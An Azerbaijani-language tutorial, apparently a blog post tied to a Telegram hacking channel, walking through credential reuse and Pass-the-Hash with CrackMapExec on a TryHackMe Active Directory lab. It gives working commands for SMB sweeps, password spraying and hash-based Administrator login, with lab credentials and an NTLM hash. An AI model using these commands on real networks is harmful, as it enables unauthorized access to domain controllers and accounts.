PTH nədir? Pass The Hash nədir? Parollardan yenidən necə istifadə etmək olar? CrackMapExec nədir? CrackMapExec necə istifadə olunur?CrackMapExec ilə PTH hücumu necə edilir?
Telegram kanalına qoşularaq bu və digər mövzular üzrə quizlərdə iştirak edə bilərsiniz!
Telegram (Kanal): https://t.me/xakeraz_official
Parolların və Hashlərin Yenidən İstifadə Edilməsi
Təsəvvür edinki, şəbəkəninin hər bir cihazında açıq formatda parolları və hashləri ayrı-ayrı yoxlayır, sizcədə möhtəşəm deyilmi.Bu alətin adı CrackMapExec-dir və o verilən əməliyyatı müvəfəqiyyətlə avtomatlaşdırır. Bir hiyləgərlik də deyim, alətdən istifadə zamanı bəzən heç istifadəçi adı və parol bilməyə ehtiyac yoxdur. Məhşur paroll kombinasiyalarını bu alətin köməyi ilə brute force edərək sistemdə məlumatları tapa bilərsiniz.Məs: admin:admin
Əvvəlcə şəbəkəni skan edərək SMB dəstəyi olan hostları və aktiv hostları tapmağa çalışırıq.Əmin olunki CrackMapExec aləti Kali Linux cihazına quraşdırılmışdır:
─(root㉿kali)-[~]
└─# crackmapexec smb 10.10.148.168/24
SMB 10.10.148.168 445 ATTACKTIVEDIREC [*] Windows 10 / Server 2019 Build 17763 x64 (name:ATTACKTIVEDIREC) (domain:spookysec.local) (signing:True) (SMBv1:False)
Göründüyü kimi tapşırıq üçün istifadə olunan Active Directory`də bir cihaz vardır.Real nümunələrdə bu əlbəttə çox olacaqdır.
Windows cihazları təyin etmək üçün SMB, Linux cihazları təyin etmək üçün isə SSH servisi qeyd edilməlidir.
└─# crackmapexec ssh 10.10.148.168/24
İndiki halda biz əvvəlcədən müəyyən etdiyimiz məlumatlar ilə həmin hücumu simulyasiya edirik.
└─# crackmapexec smb 10.10.148.168/24 -u svc-admin -p management2005
SMB 10.10.148.168 445 ATTACKTIVEDIREC [*] Windows 10 / Server 2019 Build 17763 x64 (name:ATTACKTIVEDIREC) (domain:spookysec.local) (signing:True) (SMBv1:False)
SMB 10.10.148.168 445 ATTACKTIVEDIREC [+] spookysec.local\svc-admin:management2005
Burada görə bilərikki, username svc-admin və parol management2005 10.10.148.168 hostunda işə yaramışdır və bu Domain istifadəçi hesabıdır. Lokal istifadəçi hesabına bu hücumu etmək üçün –local-auth parametrindən istifadə edilməlidir.
└─# crackmapexec smb 10.10.148.168/24 -u svc-admin -p management2005 --local-auth
Pass The Hash (PTH) Hücumu
Pass The Hash (PTH) – Hədəf hosta daxil olmaq üçün açıq parol yerinə NTLM hashindən istifadə etməyə əsaslanır.Bu əməliyyat üçün Administrator hashindən istifadə edəcəyik və DC (Domain Controller) daxil olacayıq.CrackMapExec ilə tapşırıq belə həll ediləcəkdir.
└─# crackmapexec smb 10.10.148.168/24 -u Administrator -H '0e0363213e37b94221497260b0bcb4fc'
SMB 10.10.148.168 445 ATTACKTIVEDIREC [*] Windows 10 / Server 2019 Build 17763 x64 (name:ATTACKTIVEDIREC) (domain:spookysec.local) (signing:True) (SMBv1:False)
SMB 10.10.148.168 445 ATTACKTIVEDIREC [+] spookysec.local\Administrator:0e0363213e37b94221497260b0bcb4fc (Pwn3d!)
Əla bizim hashimiz DC serverində uğurla daxil ola bildi.Cari etapdan sonrası ziyankarın xəyal gücündən asılıdır.
CrackMapExec aləti təkcə brute force əməliyyatını avtomatlaşdırmaq üçün deyil, həm də aşağıdakı əməliyyatları yerinə yetirə bilər:
- Ümumi şəbəkə resurslarının tapılması
- Aktiv seanslar haqqında məlumat əldə etmək
- Daxil olmuş istifadəçilər haqqında məlumat əldə etmək
- Domain istifadəçiləri haqqında məlumat əldə etmək
- Local/Domain qrupları haqqında məlumat əldə etmək
- və digərləri…
Tapşırıqda istifadə olunan Lab: https://tryhackme.com/room/attacktivedirectory
Ümidvaram faydalı olmuşdur.Təşəkkürlər!
Bizi izləyin:
Telegram (Kanal): https://t.me/xakeraz_official
Paylaşımların səliqəli yığılmış halı: https://t.me/xakerazgroup
Fikir və şərhləriniz : https://t.me/xakerazchat